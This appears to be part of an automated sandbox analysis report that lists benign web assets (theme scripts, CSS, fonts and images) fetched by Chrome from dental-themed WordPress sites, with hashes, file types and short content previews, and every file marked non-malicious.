                                                                                                                                      Preview:.cc-window{opacity:1;transition:opacity 1s ease}.cc-window.cc-invisible{opacity:0}.cc-animate.cc-revoke{transition:transform 1s ease}.cc-animate.cc-revoke.cc-top{transform:translateY(-2em)}.cc-animate.cc-revoke.cc-bottom{transform:translateY(2em)}.cc-animate.cc-revoke.cc-active.cc-bottom,.cc-animate.cc-revoke.cc-active.cc-top,.cc-revoke:hover{transform:translateY(0)}.cc-grower{max-height:0;overflow:hidden;transition:max-height 1s}..cc-link,.cc-revoke:hover{text-decoration:underline}.cc-revoke,.cc-window{position:fixed;overflow:hidden;box-sizing:border-box;font-family:Helvetica,userbri,Arial,sans-serif;font-size:16px;line-height:1.5em;display:-ms-flexbox;display:flex;-ms-flex-wrap:nowrap;flex-wrap:nowrap;z-index:9999}.cc-window.cc-static{position:static}.cc-window.cc-floating{padding:2em;max-width:24em;-ms-flex-direction:column;flex-direction:column}.cc-window.cc-banner{padding:1em 1.8em;width:100%;-ms-flex-direction:row;flex-direction:row}.cc-revoke{padding:.5em}.cc-header{font-size:18
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):74590
                                                                                                                                      Entropy (8bit):7.793829977099399
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:jXg3JbDSsgVJwUdmkehfLaOOO7x1H5zE0YEqVasbfYXI4RJoXN:j8DSsg7dmdhfLdTdE0NqmY4sN
                                                                                                                                      MD5:E7AC302653AADD6C1BE4732A3F1B0830
                                                                                                                                      SHA1:836F8560CA5194685EB73A1F15F8C33D32F8F074
                                                                                                                                      SHA-256:92EECEDA3C2D8063E2B753FA718DAA8D9B595F7AA1ADD69E646891C7E1AE2F98
                                                                                                                                      SHA-512:779713841C82D895A74BB44E05A62478E2CFF86307F2E05DD46FED8EA0780D672624EBF36961731AE942E44658591319FADD7F0F0DC640D26F7CFFC185991686
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/desk.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:59FDD67A08B511E79DCAE5F779D0D3BC" xmpMM:InstanceID="xmp.iid:59FDD67908B511E79DCAE5F779D0D3BC" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:68613617-165a-47a6-8ae0-734b35705161" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):84086
                                                                                                                                      Entropy (8bit):3.992854578544904
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:xTCCIwHWAUsf+iUR8XRn6Qstz37qiceasUhOx3hYEPTmn2Bdg2byv45tKJTV2:tzHWAfUR8Bndm5asUOx3hYELmyg+WJk
                                                                                                                                      MD5:5C8004630259F17E978C4772C59C53F6
                                                                                                                                      SHA1:272D85D55DA949DB51A707E4E4F872D2BCF74DDC
                                                                                                                                      SHA-256:D8D9E3820D43D724E6D10ED96AB90BFD3438F23AA77E84704B7D1419EDE90517
                                                                                                                                      SHA-512:1357C0470083F52FE1971CBDFC7CF8FDA2F770383007F3CDDF867F9DF81EA305787718872F1AAE7459C9DE18360207979CEB96A1FD58CEFB663312A67F2EF69C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/themify/js/main.js?ver=5.6.4
                                                                                                                                      Preview:;..var Themify;..((win, doc, und, $)=>{.. 'use strict';.. Themify = {.. cssLazy: {},.. jsLazy: {},.. jsCallbacks: {},.. cssCallbacks: {},.. fontsQueue: {},.. is_min: false,.. events: {},.. body: null,.. is_builder_active: false,.. is_builder_loaded: false,.. w: null,.. h: null,.. isTouch: false,.. device: 'desktop',.. isRTL: false,.. lazyDisable: false,.. lazyScrolling: null,.. url: null,.. js_modules: null,.. css_modules: null,.. jsUrl: '',.. cssUrl:'',.. observer: null,.. triggerEvent(target, type, params) {.. let ev;.. if (type === 'click' || type === 'submit' || type === 'input' || type==='resize' || (type === 'change' && !params) || type.indexOf('pointer') === 0 || type.indexOf('touch') === 0 || type.indexOf('mouse') === 0) {.. if (!params) {.. params = {
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (5028), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):9685
                                                                                                                                      Entropy (8bit):5.699882858804123
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:WxTWPpfmSV/aoHpwBn7v1soXV2QpD8jVMjg/Ozt5wQVxGuGBEjdC3BeVxGpGlwDm:cSVO8Qujv45wmVyEjGoGSuJTVwzg8
                                                                                                                                      MD5:AC34F8DD511750B4F48014FB44BAA94C
                                                                                                                                      SHA1:A8758FA235EE19B2C6BD7E4DF7B49C46491CDA81
                                                                                                                                      SHA-256:2BAD8D7C5A7E6919207DAD961767740220E140B438B292E8C9C841193B14ED4C
                                                                                                                                      SHA-512:2200FF9570DCF4504337B10C3E84B2A31A2FB712C754571C6B0CABDBA5C3592CD9DB7AF4CAFE182CEDF0B43FE466EC84F608286622DC13239B0AC8051651D1E0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/themify/js/modules/themify.sidemenu.js?ver=5.6.4
                                                                                                                                      Preview:;((Themify)=>{.....'use strict';.....const defaults = {.....panel: '#mobile-menu',.....close: '',.....side: 'right',.....hasOverlay:true,.....beforeShow:null,.....afterShow:null,.....beforeHide:null,.....afterHide:null....},....instance=[];...let overLay=null;...function SideMenu ( element, options ) {....this.element = element;....if(!options['panel'] && element.hasAttribute('href')){.....options['panel']=element.getAttribute('href');.....if(!options['panel'] || options['panel']==='#'){......options['panel']=defaults['panel'];.....}....}....this.settings = Object.assign( {}, defaults, options );....this.panelVisible = false;....const replacements = { '#':'', '\.':'', ' ':'-' };....this.panelCleanName = this.settings.panel.replace( /#|\.|\s/g, (match)=>{......return replacements[match]; .....} ....);....this.init();...}.....SideMenu.prototype = {....init() {.....const self = this;.....if(overLay===null && this.settings['hasOverlay']=== true){......overLay = document.createElement('div'
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):548
                                                                                                                                      Entropy (8bit):4.688532577858027
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
                                                                                                                                      MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                                                      SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                                                      SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                                                      SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://funcallback.com/favicon.ico
                                                                                                                                      Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19824, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19824
                                                                                                                                      Entropy (8bit):7.988343953151002
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:HUE7mQJufsCSTu1iWOP48yBtlPPHZ/ihZEWsrokINg6aJSGXvXV:37jJCsPTsQyBr52SWsrYi6KS6XV
                                                                                                                                      MD5:622C5CF19E65E2214F8700FB1F304618
                                                                                                                                      SHA1:9AFFA7DAD4BB26313EA5766A928BD7B0F1B7503D
                                                                                                                                      SHA-256:61519DEAA156F24AD28AE848179016C7CC741270CB7B30043C24BD30203BDAF3
                                                                                                                                      SHA-512:5477397240AA05389BDC28FD49D9F0736FBCDF19A0A8841369FFE1AB29ADCA0FEC677C195FCE6241F4BFE97570ADA6C2322EDC48EFF2057757270B60D1BE59ED
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/loading-page/css/fonts/JTURjIg1_i6t8kCHKm45_bZF3gnD_g.woff2
                                                                                                                                      Preview:wOF2......Mp..........M..........................X..\..^.`.....d..m.....P../..<..6.$..f. ..z..L..U...5l..=.........5l.@3l..lD.v.%(=...'%.!.... M..T(0...Du..I6.,..Z.Q...E.u.7.z..w.i.....Ay..5....~.}E`.xB.0..S9...#o..8u...6-...R~.e}.K..[..Csm..T.a.\.6.?..^.}...$^W$..0...e.d..%..({f.....*`.H.Y.0).:.S......x....TL............l.).D.................f.y.._.[.^l...vU.^.UC..d$.r:x..Z..J....z....`.8... ......1H.Vd)>....e.I .HI.J..E,.=x.{.=.Br.\.k.U......m.5..!..$.21.1...S;@....-S..S...[.+..]Y......c.`H..J"7.N.j.h_KG.8.*)0......>>...Ru..@r..... .tjM...n*.*U..z.3..o.w.R.....)..........@#..~......}.....$..@.z..m.I.pA..B%Bh......'#.........jF.!@.(.w...JGE..VW...A..O2.$C.lKr.I>......&..{....5.......r.....x..w....U%...$"...,.U....2.B.SI.T..C!-.<%.wg.f.........B.p/A.....x).+..E.B...E..=:.\...&=.&=...f..v...H^...y!....C.........!.KQZ....%.P.....2..C.NNtHyI*.1tt.K.t.v....)..k../I(\U+..q.6TL..1.^...2^.4....>zs...Z-.2.]`..TC..C..h....=w0...BE...!.c.w..(.c..u...aB0F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 17576, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):17576
                                                                                                                                      Entropy (8bit):7.986135354736866
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9FlzBIAFMur/ziLBGLlbxN8j/70j6vmoXB:bIEbXiNhP0+mox
                                                                                                                                      MD5:EFB3F28447C9EF35FD5882FB763B37C3
                                                                                                                                      SHA1:158DDD8C0348DEFA3192F26DA60A746727F4A8A3
                                                                                                                                      SHA-256:6D4370B59E36AC955C8B97F12FD5E86F7D3E80285D6AF2BFF0DAFA8E122D3C3B
                                                                                                                                      SHA-512:C0521D7C7BE4F635F70F0F466BC7A179C647C43C5AB400C8E490466BDDDE7175809B594C3D7B1A2F2AE9841CDE2F9AABFB8A967618FFB2CC7456A9B3231E0CDD
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B5caVIGxA.woff2
                                                                                                                                      Preview:wOF2......D.......}...D=.........................N.......`?STAT^.....|........<.....T..6.$..$. ..x........n'...........#.`.........9IE.LZLJ....Cf.`....0....I.Y|...`*.{j.K....EW..zG=xA..P.6....6..n.+V....+..J.. ........ ..6~.f.....o.........}.H?..1.j^.^..?...z^.J.X.6.._...I....."..5..3<Bc.......oI.av}.s.{>.. z.c...........&@-w.S..*P_.~..f..~..'+.....m..s..*.`D..(.....`.b...U.Vcn:..5.\.j.......v.. .I..K..mS#.=...w.%[.}I..>.O..'.k.k..}Gh...v..eB.....E..'"!.I...I.D...jo2.X.U.....OC.......H......8..[.... @..M.....=U/...E<.BH.I}h.j..H'..R.&O...i...kE%.....oTns.U..9.7...._....fL8....Um.@...g.[...%...0vU_.<.........Mp.."R.l.A....t..&..... X@.P..o..wI..4...c.........n.~9....U.`....gj...pu.... ..'.B,..C.\T!.v.......x.b...(0(....J......2...$...'..+..s.u]..m.E]....QS.......}.Z=.$.....q.0..2.kKK.....[.|kg.....y....`DZGC.....A8....'.....,.Iy...h.K#........)r.P)~...!o.2t........._AAvQ~.!.@hy;c.-....p.'...:4...5......!..yS4A..........yD...T.*.A.!......dK
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):77160
                                                                                                                                      Entropy (8bit):7.996509451516447
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
                                                                                                                                      MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                                                                                      SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                                                                                      SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                                                                                      SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff2
                                                                                                                                      Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15740, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):15740
                                                                                                                                      Entropy (8bit):7.987846737415935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:wp5kAzzda/zUyeFZnVN2lxJXa35/QQvk+49WTlq4:wDaXef2xXuaOkcTb
                                                                                                                                      MD5:C9CD422639CB7D3CCDD6CC6F007C7DB7
                                                                                                                                      SHA1:B82BDF8D1C66FBBED46805D044ED4101C506DABB
                                                                                                                                      SHA-256:8AB15596CE4DF1389F1754B85DEFF0AEAEA0AA77E9890BEC3A589D4FE4E197E9
                                                                                                                                      SHA-512:CA3316C4CBCD83E22B2B6A894AD8D8816B8BF51701BFF2AE4DC830E4EEE5152C488F2CEB709228A3308D88EDF44AF5550F3A6BB1A038DE371CCFF25A8379EA0C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewJER.woff2
                                                                                                                                      Preview:wOF2......=|......{...=...........................>..6....`?STATZ..J..8..........>.....6.$..4. ..\.. ....Sq%.!.q..A........ .`...v......r...w@....!..,..}.fju...R..d..5....N.......3......r.5....(b....Q.4w.....3..U.n.......D.L.[C.NU<}...e...2..'...+Lf......:.....<Dy.....o p....a..O....h.).k.=.E!.......Ld.......]4'~q....;0.&.,...8.,..........E....4.F.`.z.cn.9.uV..`&.=L..1 ...3.]i.&Y.}Z......0.....E.)H.rv.P...<.... ..4].|.m.(..k.S...g....y....0G....l..._..*8......6k..L.BPlT.91P.J.D....E.g.b.....v.......+.,5...{.r.X.Myc...2i}&.5...dg..H`?..OUA...$..[Nx&.@..(.........+sPT....WgHH......tG...F..SSL.@@..hY6.T+....%....?. ...F.sI..3.......H......X........tw.;{.fW....,u.Ro...|...}.D.f....:....H.......>.bT.].?.%...9.u...V.;...`.....".k.^..........*....w.WXu.xQ/^...Kv8.....C..q]c...b.....0.......5.atn.kW+.DA@A9U...0....fQ0........"..#."...........pp \\...![m.l...,.."..K-.fH...Q..... S.`}~wE~......_.v5...E$...Z.5.c........i.|..c.[Zw...cWZ..p[7T.*.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (26316), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):26320
                                                                                                                                      Entropy (8bit):5.004887774435638
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:oEncHJwYmzK5lNb7vmB1fW0sBNJpS2xrO0Ofnv/T78bvnbLf:Ri5lNbEW0WjtxrKfv/T78bvnbLf
                                                                                                                                      MD5:75CFF761286BC648AA0AD67C61DCA2B7
                                                                                                                                      SHA1:BDD192883A83131545FC228E825FDEF84EEBBEB1
                                                                                                                                      SHA-256:68D8C72A1380ED65DFB8F9163CDD8B7DB3DE836C00611AB533535CD8A5DF689E
                                                                                                                                      SHA-512:E4DEABE570F85AEBADFEDDB2A1B020717121A257BE8DA6108D5CA4A0ABBB8C2237F7643DEB9C20B1E1E7FA9D62735A475B2386246D0D277F52DB091AE368C69D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/css/front.css?ver=1706555011
                                                                                                                                      Preview:.wpgdprc .wpgdprc-consent-bar__notice,.wpgdprc blockquote,.wpgdprc dd,.wpgdprc dl,.wpgdprc fieldset,.wpgdprc figure,.wpgdprc h1,.wpgdprc h2,.wpgdprc h3,.wpgdprc h4,.wpgdprc h5,.wpgdprc h6,.wpgdprc hr,.wpgdprc legend,.wpgdprc ol,.wpgdprc p,.wpgdprc pre,.wpgdprc ul{margin:0;padding:0}.wpgdprc li>ol,.wpgdprc li>ul{margin-bottom:0}.wpgdprc table{border-collapse:collapse;border-spacing:0}.wpgdprc fieldset{border:0;min-width:0}.wpgdprc *,.wpgdprc :after,.wpgdprc :before{box-sizing:inherit}.wpgdprc [type=button],.wpgdprc [type=reset],.wpgdprc [type=submit]{-webkit-appearance:none;-moz-appearance:none;appearance:none;border:0;margin:0}.wpgdprc ::-moz-selection{background:#3c7c96;color:#fff}.wpgdprc ::selection{background:#3c7c96;color:#fff}.wpgdprc a{transition:all .25s cubic-bezier(0,.6,.7,1)}.wpgdprc form{margin-bottom:0}.wpgdprc .no-bullet{list-style:none}.wpgdprc .video-container{height:0;opacity:0;padding-bottom:56.25%;padding-top:25px;position:relative;transition:opacity .25s cubic-bezie
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1429
                                                                                                                                      Entropy (8bit):5.2294047974609565
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:t4Lxnb7Hx8G7GERsksUHx8GkGIv/qTHx8GVVGR2mHaLEfhuzH6wsGNaaWxIsrnGi:+xnHJCtUHJPpHJiR2JchuzawsGNaaWxH
                                                                                                                                      MD5:E82C3CD8C7349AB13088920527E4D317
                                                                                                                                      SHA1:100330F83AFE9649A4C8D76E3D6BF36A127BA9A5
                                                                                                                                      SHA-256:2BB1A2C9B9AE4D36F62EA53811554636CF3C5B74D9845E1DBACCA0CE62DC7880
                                                                                                                                      SHA-512:5AAE5ADBD5E452BC73C09672039BA2AA78CF6CDF5F562EC0100E73235E125680EC8801A09024AB0C30A3D81287E49FFD391DF83A30A163717E8708431134501F
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://upload.wikimedia.org/wikipedia/commons/e/e1/Google_Chrome_icon_%28February_2022%29.svg
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" height="48" width="48"><defs><linearGradient id="a" x1="3.2173" y1="15" x2="44.7812" y2="15" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#d93025"/><stop offset="1" stop-color="#ea4335"/></linearGradient><linearGradient id="b" x1="20.7219" y1="47.6791" x2="41.5039" y2="11.6837" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#fcc934"/><stop offset="1" stop-color="#fbbc04"/></linearGradient><linearGradient id="c" x1="26.5981" y1="46.5015" x2="5.8161" y2="10.506" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#1e8e3e"/><stop offset="1" stop-color="#34a853"/></linearGradient></defs><circle cx="24" cy="23.9947" r="12" style="fill:#fff"/><path d="M3.2154,36A24,24,0,1,0,12,3.2154,24,24,0,0,0,3.2154,36ZM34.3923,18A12,12,0,1,1,18,13.6077,12,12,0,0,1,34.3923,18Z" style="fill:none"/><path d="M24,12H44.7812a23.9939,23.9939,0,0,0-41.5639.0029L13.6079,30l.00
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):91606
                                                                                                                                      Entropy (8bit):7.894373926315305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:j6oCpXhex/9zykEJATfHd/lEC7a/59PWKF92vpufGxiIta/5dhBas5rKlzg:Yhex/RZESbdza/3PWO92vkGxiItCnmcf
                                                                                                                                      MD5:2FA2D28B86087B9916C424D959A2F1EA
                                                                                                                                      SHA1:C0F56C717C41EC0C03693D98D2053EAB4A45E737
                                                                                                                                      SHA-256:45E0C925E3E75746C5455E24C334B46809A7F5B7458502B67433FA90C25871AB
                                                                                                                                      SHA-512:AF3F019A2D0682B6368675CAF42C4162BD3019D0F167C6744DA78AE893B0795F8ABDACC09156C7FBE8E5E253556BFD8562AECA44C3B99C27168C9B9B0A573C36
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/smile.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:A10914880C8511E7925196320C0DE998" xmpMM:InstanceID="xmp.iid:A10914870C8511E7925196320C0DE998" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:968c8116-4c89-477e-b063-95cdf2104959" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1230), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1230
                                                                                                                                      Entropy (8bit):5.3685700166084835
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:skhDzJZO1rkbIGsdkBpS6dfNXE9sRsC8zX:skr6ksGJpFfN+
                                                                                                                                      MD5:23B23B8BC0D1FFACD1C86AE690A81582
                                                                                                                                      SHA1:90B8C724756EFEB278975361329DE5B6BBE7B707
                                                                                                                                      SHA-256:B9B5D2084699A03748E4B6D203BDB0F76E7DC2B17861AF9BDB39BE4369209037
                                                                                                                                      SHA-512:0621BE1DC40D3589FC630CEE010918A5721F77F2558ECB1E9AE2ADCD9C364F7803E4A8D952A2319CF75248A97E37DB789138853A1E86CEBAC7BC093E514E7884
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10
                                                                                                                                      Preview:@font-face{font-family:'Montserrat';font-style:normal;font-weight:600;font-display:swap;src:url(fonts/JTURjIg1_i6t8kCHKm45_bZF3gnD_g.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}.lp-screen-text{font-family:'Montserrat',-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,Helvetica,Arial,sans-serif,'Apple Color Emoji','Segoe UI Emoji','Segoe UI Symbol';white-space:nowrap!important}#loading_page_codeBlock{position:fixed;left:0;right:0;top:5px;margin-left:auto;margin-right:auto;text-align:center;z-index:999999;display:none}.lp-close-screen{position:fixed;z-index:999999;top:10px;right:10px;width:20px;height:20px;text-align:center;line-height:20px;color:white;background:black;display:inline-block;font-family:sans-serif;cursor:pointer;font-size:12px;opacity:.3}.lp-close-screen:hover{opacity:.9}@keyframes lp-fade{from{opacity:1.0}50%{opacity:.5}to{opacity:1.0}}@-web
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3105
                                                                                                                                      Entropy (8bit):7.904549143596417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WwLnWmQMKHFU9HEzuIeloxLhFx9CFYi6KED:WPmQM4FYE9eOxL/1iZE
                                                                                                                                      MD5:B2196391C941A66DF41DF95971830878
                                                                                                                                      SHA1:F859D6A04820CE88DA34D84DFEEB5E71DB3810CD
                                                                                                                                      SHA-256:3B85798D23FC4A9EDF41D0D2ACBACAA2BE4495A57A1DCE6EE9880EB9832F91B9
                                                                                                                                      SHA-512:3161EFE16B3F73697B9A091B5103A5E42124D4DCAA8D32A845FF55E5CD98B6E5F992B7A188E14D15FD007D0BFC7E4BA7FC2AA079C20835C601D9F535D69155B0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
